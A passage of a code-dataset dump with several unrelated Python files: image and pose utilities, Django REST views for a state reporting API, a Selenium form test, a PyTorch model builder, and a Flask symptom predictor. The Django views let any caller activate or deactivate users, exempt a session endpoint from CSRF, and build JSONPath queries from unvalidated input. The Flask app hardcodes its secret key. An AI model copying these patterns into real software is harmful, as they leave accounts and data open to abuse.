np\nimport sys\nimport math\n\n\n\n\n\n#imgColor = Image.open(\"/home/david/Downloads/veloCOLOR.jpeg\")\n#print(np.array(imgColor).shape)\n\ndef check_BW(image):\n\tarray_img = np.array(image)\n\tnum_of_dimensions = len(array_img.shape)\n\ttotal_pixel = array_img.shape[0] * array_img.shape[1]\n\tif total_pixel < 10000: \n\t\tstep_i = 1\n\t\tstep_j = 1\n\telse:\n\t\tstep_i = array_img.shape[0] // 100\n\t\tstep_j = array_img.shape[1] // 100\n\tif num_of_dimensions < 3:\n\t\treturn True\n\tBW_pixel = 0\n\tcount = 0\n\tfor i in range(0, array_img.shape[0], step_i):\n\t\tfor j in range(0, array_img.shape[1], step_j):\n\t\t\tpixel = array_img[i,j]\n\t\t\tavg = sum(pixel[0:3] / 3)\n\t\t\tcount += 1\n\t\t\tif abs(pixel[1] - avg) < 2:\n\t\t\t\tBW_pixel += 1\n\tif BW_pixel / count > 0.9:\n\t\treturn True\n\telse:\n\t\treturn False\n\t\n\ndef main():\n\timage_path = sys.argv[1]\n\ttry:\n\t\timg = Image.open(image_path)\n\texcept:\n\t\tprint(\"Black-White-Check could no read image.\")\n\t\treturn\n\tis_BW = check_BW(img)\n\tif is_BW:\n\t\tprint (\"The image is black and white...\")\n\telse:\n\t\treturn 0\n\nif __name__ == \"__main__\":\n\tmain()\n\t","sub_path":"david/SWcheck.py","file_name":"SWcheck.py","file_ext":"py","file_size_in_byte":1070,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"56"} +{"seq_id":"157633966","text":"import cv2, math\nimport numpy as np\n\n# FUNCTION TO MAKE 2D IMAGE\ndef make2d(shape):\n imagePoints = [[shape.part(30).x, shape.part(30).y],\n [shape.part(8).x, shape.part(8).y],\n [shape.part(36).x, shape.part(36).y],\n [shape.part(45).x, shape.part(45).y],\n [shape.part(48).x, shape.part(48).y],\n [shape.part(54).x, shape.part(54).y]]\n return np.array(imagePoints, dtype=np.float64)\n# FUNCTION DEFINITION END \n\n# FUNCTION TO MAKE 3D MODEL POINTS\ndef make3d():\n modelPoints = [[0.0, 0.0, 0.0],\n [0.0, -330.0, -65.0],\n [-225.0, 170.0, -135.0],\n [225.0, 170.0, -135.0],\n [-150.0, -150.0, -125.0],\n [150.0, -150.0, -125.0]]\n return np.array(modelPoints, dtype=np.float64)\n# FUNCTION DEFINITION END \n\n# GETTING THE EULER ANGLES\ndef get_euler_angle(rotation_vector):\n # calculate rotation angles\n theta = cv2.norm(rotation_vector, cv2.NORM_L2)\n \n # transformed to quaterniond\n w = math.cos(theta / 2)\n x = math.sin(theta / 2)*rotation_vector[0][0] / theta\n y = math.sin(theta / 2)*rotation_vector[1][0] / theta\n z = math.sin(theta / 2)*rotation_vector[2][0] / theta\n \n ysqr = y * y\n # pitch (x-axis rotation)\n t0 = 2.0 * (w * x + y * z)\n t1 = 1.0 - 2.0 * (x * x + ysqr)\n # print('t0:{}, t1:{}'.format(t0, t1))\n pitch = math.atan2(t0, t1)\n \n # yaw (y-axis rotation)\n t2 = 2.0 * (w * y - z * x)\n if t2 > 1.0:\n t2 = 1.0\n if t2 < -1.0:\n t2 = -1.0\n yaw = math.asin(t2)\n \n # roll (z-axis rotation)\n t3 = 2.0 * (w * z + x * y)\n t4 = 1.0 - 2.0 * (ysqr + z * z)\n roll = math.atan2(t3, t4)\n \n # print('pitch:{}, yaw:{}, roll:{}'.format(pitch, yaw, roll))\n \n\t # Unit conversion: convert radians to degrees\n Y = int((pitch/math.pi)*180)\n X = int((yaw/math.pi)*180)\n Z = int((roll/math.pi)*180)\n \n return 0, Y, X, Z\n#FUNCTION DEFINITION END\n\n# CHOOSING THE LARGEST FACE\ndef faceIndex(rects):\n if len(rects)==1:\n return 0\n elif len(rects)==0:\n return -1\n area=((rect.right()-rect.left())*(rect.bottom()-rect.top()) for rect in rects)\n area=list(area)\n maxIndex=0\n maximum=area[0]\n for i in range(1,len(area)):\n if (area[i]>maximum):\n maxIndex=i\n maximum=area[i]\n return maxIndex\n#FUNCTION DEFINITION END\n","sub_path":"SocketTesting/EulerAng.py","file_name":"EulerAng.py","file_ext":"py","file_size_in_byte":2455,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"56"} +{"seq_id":"235054478","text":"import json\nimport string\nfrom typing import (\n Dict,\n List,\n Union,\n)\n\nfrom datetime import datetime\nfrom django.contrib.auth.models import User, Group # type: ignore\nfrom django.db import transaction # type: ignore\nfrom django.http import HttpResponse # type: ignore\nfrom django.template.loader import get_template # type: ignore\nfrom django.utils import timezone # type: ignore\nfrom jsonpath_ng.ext import parse # type: ignore\nfrom jsonpath_ng import DatumInContext # type: ignore\nfrom rest_framework import viewsets # type: ignore\nfrom rest_framework.decorators import ( # type: ignore\n api_view,\n)\nfrom rest_framework.exceptions import ( # type: ignore\n PermissionDenied,\n ValidationError,\n)\nfrom rest_framework.response import Response # type: ignore\nfrom rest_framework.permissions import ( # type: ignore\n IsAuthenticated,\n IsAuthenticatedOrReadOnly,\n AllowAny,\n)\nfrom carts.auth_dev import JwtDevAuthentication\nfrom carts.permissions import (\n AdminHideRoleFromUsername,\n AdminHideRoleFromJobCode,\n AdminHideRolesFromJobCode,\n AdminHideStatesFromUsername,\n StateChangeSectionPermission,\n StateViewSectionPermission,\n)\nfrom carts.carts_api.serializers import (\n UserSerializer,\n GroupSerializer,\n RoleFromUsernameSerializer,\n RoleFromJobCodeSerializer,\n RolesFromJobCodeSerializer,\n SectionSerializer,\n SectionBaseSerializer,\n SectionSchemaSerializer,\n StateSerializer,\n StateStatusSerializer,\n StatesFromUsernameSerializer,\n)\nfrom carts.carts_api.models import (\n RoleFromUsername,\n RoleFromJobCode,\n RolesFromJobCode,\n Section,\n SectionBase,\n SectionSchema,\n State,\n StateStatus,\n StatesFromUsername,\n UserProfiles,\n)\nfrom carts.carts_api.model_utils import validate_status_change\n\nfrom django.views.decorators.csrf import csrf_exempt\nfrom django.views.decorators.csrf import ensure_csrf_cookie\n\nfrom django.core.serializers.json import DjangoJSONEncoder\n\n\n# TODO: This should be absolutely stored elswhere.\nSTATE_INFO = {\n \"AK\": {\"program_type\": \"medicaid_exp_chip\"},\n \"AZ\": {\"program_type\": \"separate_chip\"},\n \"MA\": {\"program_type\": \"combo\"},\n}\n\n\nclass UserViewSet(viewsets.ModelViewSet):\n \"\"\"\n API endpoint that allows users to be viewed or edited.\n \"\"\"\n\n permission_classes = [IsAuthenticated]\n queryset = User.objects.all().order_by(\"-date_joined\")\n serializer_class = UserSerializer\n\n\n@api_view([\"POST\"])\ndef UserProfilesViewSet(request):\n \"\"\"\n API endpoint that returns all user profile data.\n \"\"\"\n\n # Get all users\n users = list(UserProfiles.objects.all().order_by(\"username\").values())\n\n return HttpResponse(json.dumps(users, cls=DjangoJSONEncoder))\n\n\nclass GroupViewSet(viewsets.ModelViewSet):\n \"\"\"\n API endpoint that allows groups to be viewed or edited.\n \"\"\"\n\n permission_classes = [IsAuthenticated]\n queryset = Group.objects.all()\n serializer_class = GroupSerializer\n\n\nclass StateViewSet(viewsets.ModelViewSet):\n \"\"\"\n API endpoint that returns state data.\n \"\"\"\n\n permission_classes = [IsAuthenticatedOrReadOnly]\n queryset = State.objects.all()\n serializer_class = StateSerializer\n\n # def list(self, request):\n # return Response(self.serializer_class(self.queryset).data)\n\n\nclass StatesFromUsernameViewSet(viewsets.ModelViewSet):\n \"\"\"\n API endpoint for username–state associations.\n \"\"\"\n\n permission_classes = [AdminHideStatesFromUsername]\n queryset = StatesFromUsername.objects.all()\n serializer_class = StatesFromUsernameSerializer\n\n def create(self, request):\n # We want there only to be one entry per username, and for the new\n # entry to overwrite.\n username = request.data.get(\"username\")\n existing = StatesFromUsername.objects.filter(username=username)\n for relation in existing:\n relation.delete()\n return super().create(request)\n\n\nclass RoleFromUsernameViewSet(viewsets.ModelViewSet):\n \"\"\"\n API endpoint for username–state associations.\n \"\"\"\n\n permission_classes = [AdminHideRoleFromUsername]\n queryset = RoleFromUsername.objects.all()\n serializer_class = RoleFromUsernameSerializer\n\n def create(self, request):\n # We want there only to be one entry per username, and for the new\n # entry to overwrite.\n username = request.data.get(\"username\")\n existing = RoleFromUsername.objects.filter(username=username)\n for relation in existing:\n relation.delete()\n return super().create(request)\n\n\nclass RoleFromJobCodeViewSet(viewsets.ModelViewSet):\n \"\"\"\n API endpoint for username–state associations.\n \"\"\"\n\n permission_classes = [AdminHideRoleFromJobCode]\n queryset = RoleFromJobCode.objects.all()\n serializer_class = RoleFromJobCodeSerializer\n\n def create(self, request):\n # We want there only to be one entry per job code, and for the new\n # entry to overwrite.\n job_code = request.data.get(\"job_code\")\n existing = RoleFromJobCode.objects.filter(job_code=job_code)\n for relation in existing:\n relation.delete()\n return super().create(request)\n\n\nclass RolesFromJobCodeViewSet(viewsets.ModelViewSet):\n \"\"\"\n API endpoint for username–state associations.\n \"\"\"\n\n permission_classes = [AdminHideRolesFromJobCode]\n queryset = RolesFromJobCode.objects.all()\n serializer_class = RolesFromJobCodeSerializer\n\n def create(self, request):\n # We want there only to be one entry per job code, and for the new\n # entry to overwrite.\n job_code = request.data.get(\"job_code\")\n existing = RolesFromJobCode.objects.filter(job_code=job_code)\n for relation in existing:\n relation.delete()\n return super().create(request)\n\n\nclass StateStatusViewSet(viewsets.ModelViewSet):\n \"\"\"\n API endpoint for state status.\n \"\"\"\n\n permission_classes = [\n StateViewSectionPermission,\n StateChangeSectionPermission,\n ]\n queryset = StateStatus.objects.all()\n serializer_class = StateStatusSerializer\n\n def create(self, request):\n \"\"\"\n The object being created here is the newest status for a given\n state/year.\n We expect the post request to have state, year, and status; we get the\n user from request.user and we update last_changed ourselves.\n\n We've had some confusion over whether or not the name for a form in\n progress is \"in progress\" or \"started\", so we accommodate both below\n and turn the latter into the former.\n\n \"\"\"\n state_code = request.data.get(\"state\")\n year = request.data.get(\"year\")\n new_status = request.data.get(\"status\")\n if new_status == \"started\":\n new_status = \"in_progress\"\n user = request.user\n try:\n assert all([state_code, year, new_status, user])\n except AssertionError:\n return HttpResponse(\n \"state_code, year, status, or user missing\", status=400\n )\n state = State.objects.get(code=state_code.upper())\n current = (\n StateStatus.objects.all()\n .filter(state_id=state_code.upper(), year=year)\n .order_by(\"last_changed\")\n .last()\n )\n current_status = current.status if current else \"not_started\"\n if current_status == new_status:\n return self.list(request)\n if current_status == \"started\":\n current_status = \"in_progress\"\n is_change_valid = validate_status_change(\n user.appuser.role, current_status, new_status\n )\n if is_change_valid.update_success:\n updated = StateStatus.objects.create(\n state=state,\n year=year,\n status=is_change_valid.new_status,\n last_changed=datetime.now(tz=timezone.utc),\n user_name=user.username,\n )\n updated.save()\n \"\"\"\n The \"submitted\" state is transitory and we should probably get rid\n of it, but while it exists, it exists only to be immediately turned\n into \"certified\":\n \"\"\"\n if updated.status == \"submitted\":\n certified = StateStatus.objects.create(\n state=state,\n year=year,\n status=\"certified\",\n last_changed=datetime.now(tz=timezone.utc),\n user_name=user.username,\n )\n certified.save()\n\n return self.list(request)\n\n return HttpResponse(is_change_valid.message, status=400)\n\n def get_queryset(self):\n user = self.request.user\n if user.appuser.role == \"state_user\":\n state = user.appuser.states.all()[0]\n return StateStatus.objects.filter(state=state)\n elif user.appuser.role in (\"bus_user\", \"co_user\"):\n return StateStatus.objects.all()\n\n\nclass SectionViewSet(viewsets.ModelViewSet):\n \"\"\"\n API endpoint that allows groups to be viewed or edited.\n \"\"\"\n\n queryset = Section.objects.all()\n serializer_class = SectionSerializer\n permission_classes = [\n StateViewSectionPermission,\n StateChangeSectionPermission,\n ]\n\n def list(self, request):\n queryset = self.get_queryset()\n serializer = SectionSerializer(\n queryset, many=True, context={\"request\": request}\n )\n return Response(serializer.data)\n\n def get_sections_by_year_and_state(self, request, year, state):\n sections = self.get_queryset().filter(\n contents__section__year=year,\n contents__section__state=state.upper(),\n )\n\n for section in sections:\n # TODO: streamline this so if users have access to all of the\n # objects (e.g. if they're admins) the check occurs ony once.\n print(\"about to check object permissions\", flush=True)\n self.check_object_permissions(request, section)\n\n serializer = SectionSerializer(\n sections, many=True, context={\"request\": request}\n )\n return Response(serializer.data)\n\n def get_section_by_year_and_state(self, request, year, state, section):\n section = Section.objects.get(\n contents__section__year=year,\n contents__section__state=state.upper(),\n contents__section__ordinal=section,\n )\n\n self.check_object_permissions(request, section)\n\n serializer = SectionSerializer(section, context={\"request\": request})\n return Response(serializer.data)\n\n transaction.atomic\n\n def update_sections(self, request):\n try:\n state_id = False\n year = False\n\n for entry in request.data:\n section_id = entry[\"contents\"][\"section\"][\"id\"]\n section_state = entry[\"contents\"][\"section\"][\"state\"]\n state_id = section_state.upper()\n year = entry[\"contents\"][\"section\"][\"year\"]\n\n section = Section.objects.get(\n contents__section__id=section_id,\n contents__section__state=section_state.upper(),\n )\n\n self.check_object_permissions(request, section)\n\n status = (\n StateStatus.objects.all()\n .filter(state_id=state_id, year=year)\n .order_by(\"last_changed\")\n .last()\n )\n can_save = status is None or status.status not in [\n \"certified\",\n \"published\",\n \"approved\",\n ]\n\n if request.user.appuser.role != \"state_user\":\n can_save = False\n\n if not can_save:\n return HttpResponse(\n f\"cannot save {status} report\", status=400\n )\n\n section.contents = entry[\"contents\"]\n section.save()\n\n status = (\n StateStatus.objects.all()\n .filter(state_id=section_state, year=year)\n .order_by(\"last_changed\")\n .last()\n )\n\n if status.status == \"in_progress\":\n status.last_changed = datetime.now(tz=timezone.utc)\n status.save()\n else:\n # if the form is being changed, it must be in progress:\n state = State.objects.get(code=section_state.upper())\n updated = StateStatus.objects.create(\n state=state,\n year=year,\n status=\"in_progress\",\n last_changed=datetime.now(tz=timezone.utc),\n user_name=request.user.username,\n )\n updated.save()\n\n return HttpResponse(status=204)\n\n except PermissionDenied:\n raise\n except Exception as e:\n raise ValidationError(\n \"There is a problem with the provided data.\", 400\n ) from e\n\n def get_permissions(self):\n permission_classes_by_action = {\n \"get_sections_by_year_and_state\": [StateViewSectionPermission],\n \"get_section_by_year_and_state\": [StateViewSectionPermission],\n \"update_sections\": [\n StateViewSectionPermission,\n StateChangeSectionPermission,\n ],\n }\n\n try:\n return [\n permission()\n for permission in permission_classes_by_action[self.action]\n ]\n except:\n return [permission() for permission in self.permission_classes]\n\n\n@api_view([\"GET\"])\ndef section_by_year_and_state(request, year, state, section):\n try:\n data = Section.objects.get(\n contents__section__year=year,\n contents__section__state=state.upper(),\n contents__section__ordinal=section,\n )\n except Section.DoesNotExist:\n return HttpResponse(status=404)\n\n if request.method == \"GET\":\n serializer = SectionSerializer(data)\n return Response(serializer.data)\n\n\n@api_view([\"GET\"])\ndef sectionbases_by_year(request, year):\n try:\n data = SectionBase.objects.filter(contents__section__year=year)\n except SectionBase.DoesNotExist:\n return HttpResponse(status=404)\n\n if request.method == \"GET\":\n serializer = SectionBaseSerializer(\n data, many=True, context={\"request\": request}\n )\n return Response(serializer.data)\n\n\n@api_view([\"GET\"])\ndef sectionbase_by_year_and_section(request, year, section):\n try:\n data = SectionBase.objects.get(\n contents__section__year=year, contents__section__ordinal=section\n )\n except SectionBase.DoesNotExist:\n return HttpResponse(status=404)\n\n if request.method == \"GET\":\n serializer = SectionBaseSerializer(data)\n return Response(serializer.data)\n\n\n@api_view([\"GET\"])\ndef sectionbase_by_year_section_subsection(request, year, section, subsection):\n try:\n data = SectionBase.objects.get(\n contents__section__year=year, contents__section__ordinal=section\n )\n subsection_id = _id_from_chunks(year, section, subsection)\n subsections = data.contents[\"section\"][\"subsections\"]\n targets = [_ for _ in subsections if _[\"id\"] == subsection_id]\n if not targets:\n return HttpResponse(status=404)\n data.contents = targets[0] if len(targets) == 1 else targets\n\n except SectionBase.DoesNotExist:\n return HttpResponse(status=404)\n\n if request.method == \"GET\":\n serializer = SectionBaseSerializer(data)\n return Response(serializer.data)\n\n\n@api_view([\"GET\"])\ndef section_subsection_by_year_and_state(\n request, year, state, section, subsection\n):\n try:\n data = Section.objects.get(\n contents__section__year=year,\n contents__section__state=state.upper(),\n contents__section__ordinal=section,\n )\n subsections = data.contents[\"section\"][\"subsections\"]\n subsection_id = _id_from_chunks(year, section, subsection)\n targets = [_ for _ in subsections if _[\"id\"] == subsection_id]\n if not targets:\n return HttpResponse(status=404)\n data.contents = targets[0] if len(targets) == 1 else targets\n\n except Section.DoesNotExist:\n return HttpResponse(status=404)\n\n if request.method == \"GET\":\n serializer = SectionSerializer(data)\n return Response(serializer.data)\n\n\n@api_view([\"GET\"])\ndef fragment_by_year_state_id(request, state, id):\n try:\n year, section = _year_section_query_from_id(id)\n data = Section.objects.get(\n contents__section__year=year,\n contents__section__state=state.upper(),\n contents__section__ordinal=section,\n )\n targets = _get_fragment_by_id(id, data.contents.get(\"section\"))\n if not len(targets) == 1:\n return HttpResponse(status=404)\n data.contents = targets[0].value\n\n except Section.DoesNotExist:\n return HttpResponse(status=404)\n\n if request.method == \"GET\":\n serializer = SectionSerializer(data)\n return Response(serializer.data)\n\n\n@api_view([\"GET\"])\ndef generic_fragment_by_id(request, id):\n try:\n year, section = _year_section_query_from_id(id)\n data = SectionBase.objects.get(\n contents__section__year=year, contents__section__ordinal=section\n )\n targets = _get_fragment_by_id(id, data.contents.get(\"section\"))\n if not len(targets) == 1:\n return HttpResponse(status=404)\n data.contents = targets[0].value\n\n except Section.DoesNotExist:\n return HttpResponse(status=404)\n\n if request.method == \"GET\":\n serializer = SectionBaseSerializer(data)\n return Response(serializer.data)\n\n\nclass SectionBaseViewSet(viewsets.ModelViewSet):\n \"\"\"\n API endpoint that allows groups to be viewed or edited.\n \"\"\"\n\n permission_classes = [IsAuthenticatedOrReadOnly]\n queryset = SectionBase.objects.all()\n serializer_class = SectionBaseSerializer\n\n\nclass SectionSchemaViewSet(viewsets.ModelViewSet):\n \"\"\"\n API endpoint that allows groups to be viewed or edited.\n \"\"\"\n\n permission_classes = [IsAuthenticatedOrReadOnly]\n queryset = SectionSchema.objects.all()\n serializer_class = SectionSchemaSerializer\n\n\ndef report(request, year=None, state=None):\n assert year\n assert state\n sections = Section.objects.filter(\n contents__section__year=year, contents__section__state=state.upper()\n )\n ordered = sorted(\n [_.contents[\"section\"] for _ in sections], key=lambda s: s[\"ordinal\"]\n )\n context = {\n \"sections\": ordered,\n \"state\": STATE_INFO[state.upper()],\n \"l\": len(ordered),\n }\n report_template = get_template(\"report.html\")\n return HttpResponse(report_template.render(context=context))\n\n\n@api_view([\"POST\"])\ndef UserActivateViewSet(request, user=None):\n # Get user\n current = User.objects.get(username=user)\n current.is_active = True\n current.save()\n\n return HttpResponse(\"Activated User\")\n\n\n@api_view([\"POST\"])\ndef UserDeactivateViewSet(request, user=None):\n # Get user\n current = User.objects.get(username=user)\n current.is_active = False\n current.save()\n\n return HttpResponse(\"Deactivated User\")\n\n\ndef fake_user_data(request, username=None): # pylint: disable=unused-argument\n jwt_auth = JwtDevAuthentication()\n user, _ = jwt_auth.authenticate(request, username=username)\n state = user.appuser.states.all()[0] if user.appuser.states.all() else []\n groups = \", \".join(user.groups.all().values_list(\"name\", flat=True))\n\n program_names = \", \".join(state.program_names) if state else None\n program_text = f\"{state.code.upper} {program_names}\" if state else None\n\n user_data = {\n \"name\": state.name if state else None,\n \"abbr\": state.code.upper() if state else None,\n \"programType\": state.program_type if state else None,\n \"programName\": program_text,\n \"formName\": \"CARTS FY\",\n \"currentUser\": {\n \"role\": user.appuser.role,\n \"firstname\": user.first_name,\n \"lastname\": user.last_name,\n \"state\": {\n \"id\": state.code.upper() if state else None,\n \"name\": state.name if state else None,\n },\n \"username\": user.username,\n \"email\": user.email,\n \"group\": groups,\n },\n }\n\n return HttpResponse(json.dumps(user_data))\n\n\n@csrf_exempt\n@ensure_csrf_cookie\ndef initiate_session(request):\n print(f\"\\n\\n\\n!!!!!!!!!!!!!!!initiating session\")\n resultJson = {\"transaction_result\": \"success\"}\n\n return HttpResponse(json.dumps(resultJson))\n\n\n@api_view([\"POST\"])\ndef authenticate_user(request):\n user = request.user\n states = [*user.appuser.states.all()]\n groups = \", \".join(user.groups.all().values_list(\"name\", flat=True))\n\n # The JS currently only knows how to handle one state per user, so:\n state = None\n if states:\n state = states[0]\n\n program_names = \", \".join(state.program_names) if state else None\n program_text = f\"{state.code.upper} {program_names}\" if state else None\n\n user_data = {\n \"name\": state.name if state else None,\n \"abbr\": state.code.upper() if state else None,\n \"programType\": state.program_type if state else None,\n \"programName\": program_text,\n \"formName\": \"CARTS FY\",\n \"currentUser\": {\n \"role\": user.appuser.role,\n \"firstname\": user.first_name,\n \"lastname\": user.last_name,\n \"state\": {\n \"id\": state.code.upper() if state else None,\n \"name\": state.name if state else None,\n },\n \"username\": user.username,\n \"email\": user.email,\n \"group\": groups,\n },\n }\n return HttpResponse(json.dumps(user_data))\n\n\ndef _id_from_chunks(year, *args):\n def fill(chunk):\n chunk = str(chunk).lower()\n if chunk in string.ascii_lowercase:\n return chunk\n return chunk.zfill(2)\n\n chunks = [year] + [*args]\n\n return \"-\".join(fill(c) for c in chunks)\n\n\ndef _year_section_query_from_id(ident: str) -> List[int]:\n return [int(_) for _ in ident.split(\"-\")[:2]]\n\n\ndef _get_fragment_by_id(\n ident: str, contents: Union[Dict, List]\n) -> DatumInContext:\n pathstring = f\"$..*[?(@.id=='{ident}')]\"\n find_by_id = parse(pathstring)\n return find_by_id.find(contents)\n","sub_path":"frontend/api_postgres/carts/carts_api/views.py","file_name":"views.py","file_ext":"py","file_size_in_byte":22810,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"56"} +{"seq_id":"476970230","text":"'''\ncreated by carlo occhiena on dec 2020\n'''\n\nfrom selenium import webdriver #to handle chromium webdriver\n\n#load the chrome webdriver (get the right one from https://chromedriver.chromium.org/downloads)\nbrowser = webdriver.Chrome(\"D:\\yourpath\\chromedriver.exe\")\n\n'''\nTesting newsletter form \n'''\n\n\n#open the webpage\nbrowser.get(\"http://www.yoursite.com\")\n\n#login info\nmailID = browser.find_element_by_id(\"mce-EMAIL\")\nmailID.send_keys(\"ceo@mail.com\")\n\nnameID = browser.find_element_by_id(\"mce-NOME\")\nnameID.send_keys(\"super mario bros\")\n\nnameID.submit()\n","sub_path":"main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":557,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"56"} +{"seq_id":"314708648","text":"'''Command_line application for training a neural network and predicting image type\nBuild_model file defines function to build the neural network\nreturns neural network\nAuthor: Saeed Sheikh\nDate: Oct 26 2018'''\n\nimport torch\nfrom torch import nn\nimport torch.nn.functional as F\nfrom torchvision import models\n\ndef build_network(model_name, hidden_sizes):\n\n vgg19 = models.vgg19(pretrained = True)\n densenet161 = models.densenet161(pretrained = True)\n alexnet = models.alexnet(pretrained = True)\n\n models_dict = {'densenet': densenet161, 'alexnet': alexnet, 'vgg': vgg19}\n\n input_size = 0\n model = models_dict[model_name]\n\n if model_name == 'vgg':\n input_size = 25088\n elif model_name == 'densenet':\n input_size = 2208\n elif model_name == 'alexnet':\n input_size = 9216\n else:\n print('Unsupported model used or model architecture enter incorrectly')\n \n #Freezing parameters for features\n for param in model.parameters():\n param.requires_grad = False\n\n #Building classifier network using OrderedDict \n from collections import OrderedDict\n\n input_layer = input_size\n hidden_layers = hidden_sizes\n #Output size is set to 102 as model is beign trained to classify flower type out of 102 possible types\n output_size = 102\n\n from collections import OrderedDict\n classifier = nn.Sequential(OrderedDict([\n ('fc1', nn.Linear(input_layer, hidden_layers)),\n ('relu1', nn.ReLU()),\n ('fc2', nn.Linear(hidden_layers, output_size)),\n ('output', nn.LogSoftmax(dim=1))\n ]))\n\n\n model.classifier = classifier\n\n return model\n\n\n \n \n\n","sub_path":"build_model.py","file_name":"build_model.py","file_ext":"py","file_size_in_byte":1745,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"56"} +{"seq_id":"39982222","text":"#echo \"select position, count(*) from declarations_section group by position \" | mysql -h migalka -D disclosures_db -u disclosures -pdisclosures >positions.txt\nfrom robots.common.primitives import normalize_and_russify_anchor_text\nimport re\nfrom collections import defaultdict\nimport argparse\n\n\ndef parse_args():\n parser = argparse.ArgumentParser()\n parser.add_argument(\"--raw-positions\", dest='raw_positions', required=True)\n return parser.parse_args()\n\nclass TGraphCluster:\n\n def __init__(self, item, count):\n self.collocs = defaultdict(int)\n item = item.replace('\\\\n', ' ')\n item = normalize_and_russify_anchor_text(item)\n self.graphematical_key = re.sub('[ -]', '', item).lower()\n self.collocs[item] += count\n\n def get_total_sum(self):\n return sum(v for v in self.items.values())\n\n def get_max_item(self):\n best = \"\"\n max_v = 0\n for k, v in self.collocs.items():\n if v > max_v:\n best = k\n max_v = v\n return best\n\n def add_cluster(self, c):\n for k,v in c.collocs.items():\n self.collocs[k] += v\n\n\nif __name__ == '__main__':\n args = parse_args()\n graph_buckets = dict()\n with open (args.raw_positions) as inp:\n for line in inp:\n line = line.strip()\n items = line.split(\"\\t\")\n if len(items) == 1:\n continue\n position_str, count = items\n if count == \"count(*)\":\n continue\n c = TGraphCluster(position_str, int(count))\n\n if c.graphematical_key in graph_buckets:\n graph_buckets[c.graphematical_key].add_cluster(c)\n else:\n graph_buckets[c.graphematical_key] = c\n\n for b in graph_buckets.values():\n print (\"key={}, best={}\".format(b.graphematical_key, b.get_max_item()))\n for k,v in b.collocs.items():\n print (\"\\t{}\\t{}\".format(k, v))\n\n","sub_path":"tools/disclosures_site/scripts/positions.py","file_name":"positions.py","file_ext":"py","file_size_in_byte":1979,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"56"} +{"seq_id":"104805266","text":"# -*- coding: utf-8 -*-\r\nfrom flask import Flask, url_for, render_template, request, redirect, session\r\nfrom symptomaddform import SymptomAddForm\r\nfrom symptommodel import SymptomModel\r\nfrom illnessmodel import IllnessModel\r\nfrom predictform import PredictForm\r\nfrom shutil import copy\r\nfrom db import DB\r\n\r\napp = Flask(__name__)\r\napp.config['SECRET_KEY'] = 'codeday'\r\n\r\nsymptoms_db = DB('symptoms.db')\r\nsymptoms_init = SymptomModel(symptoms_db.get_connection())\r\nsymptoms_init.init_table()\r\n\r\nillnesses_db = DB('illnesses.db')\r\nillnesses_init = IllnessModel(illnesses_db.get_connection())\r\nillnesses_init.init_table()\r\n\r\n\r\n@app.route('/addsymptom', methods=['GET', 'POST'])\r\ndef addsymptom():\r\n \r\n form = SymptomAddForm()\r\n \r\n if form.validate_on_submit():\r\n symptom = form.symptom.data\r\n illness = form.illness.data\r\n \r\n illness_model = IllnessModel(illnesses_db.get_connection())\r\n illness_id = illness_model.exists(illness)[1] \r\n \r\n symptom_model = SymptomModel(symptoms_db.get_connection())\r\n data = symptom_model.exists(symptom) \r\n \r\n if not data[0]: \r\n symptom_model.insert(symptom, illness, illness_id)\r\n return redirect(\"/addsymptom\")\r\n return render_template('addsymptom.html', title='Add Symptom', form=form)\r\n\r\n\r\n@app.route('/predict', methods=['GET', 'POST'])\r\ndef predict():\r\n \r\n form = PredictForm()\r\n \r\n if form.validate_on_submit():\r\n \r\n data = []\r\n \r\n symptom_model = SymptomModel(symptoms_db.get_connection())\r\n illness_model = IllnessModel(illnesses_db.get_connection()) \r\n \r\n symptom1 = form.symptom1.data\r\n data.append(symptom_model.exists(symptom1)[0])\r\n symptom2 = form.symptom2.data\r\n data.append(symptom_model.exists(symptom2)[0])\r\n symptom3 = form.symptom3.data\r\n data.append(symptom_model.exists(symptom3)[0])\r\n symptom4 = form.symptom4.data\r\n data.append(symptom_model.exists(symptom4)[0])\r\n symptom5 = form.symptom5.data \r\n data.append(symptom_model.exists(symptom5)[0]) \r\n\r\n cooler_data = 'Q'.join(data)\r\n\r\n return redirect('/prediction/' + str(cooler_data))\r\n \r\n return render_template('predict.html', title='Health Predictor', form=form)\r\n\r\n@app.route('/prediction/')\r\ndef prediction(data):\r\n \r\n illness_model = IllnessModel(illnesses_db.get_connection())\r\n \r\n real_data = list(map(int, data.split('Q')))\r\n\r\n illnesses = []\r\n for i in real_data:\r\n illness = illness_model.get(i)\r\n if illness != 'no illness':\r\n illnesses.append(illness)\r\n \r\n illnesses.sort()\r\n print(illnesses)\r\n cur = 1\r\n q = []\r\n for i in range(1, len(illnesses)):\r\n if illnesses[i] == illnesses[i - 1]:\r\n cur += 1\r\n else:\r\n q.append((illnesses[i - 1], cur))\r\n cur = 1 \r\n if illnesses[-1] == illnesses[-2]:\r\n q.append((illnesses[-1], cur))\r\n else:\r\n q.append((illnesses[-1], 1))\r\n \r\n for i in q:\r\n print(i[0], str(int(i[1]/len(illnesses) * 100)) + '%')\r\n \r\n return render_template('index.html', title='Health Predictor')\r\n\r\n@app.route('/')\r\n@app.route('/index')\r\ndef index():\r\n \r\n\r\n return render_template('index.html', title='Health Predictor')\r\n\r\nif __name__ == '__main__':\r\n app.run(port=8000, host='127.0.0.1')","sub_path":"hackathon/server.py","file_name":"server.py","file_ext":"py","file_size_in_byte":3468,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"56"} +{"seq_id":"242890837","text":"def check_div(a):\n if (a%3==0 or a%5==0):\n return True\n else:\n \treturn False\n\nsum=0\nfor i in range(1,1000):\n if check_div(i):\n sum+=i\n\nprint (sum)\n","sub_path":"1/1.py","file_name":"1.py","file_ext":"py","file_size_in_byte":173,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"56"} +{"seq_id":"61256793","text":"#!/usr/bin/env python\n#coding:utf-8\n\nfrom .base import BasicAdapter\nfrom toughradius.common import tools\nfrom hashlib import md5\nimport urllib2\nimport json\n\nclass RestError(BaseException):pass\n\nclass RestAdapter(BasicAdapter):\n\n def 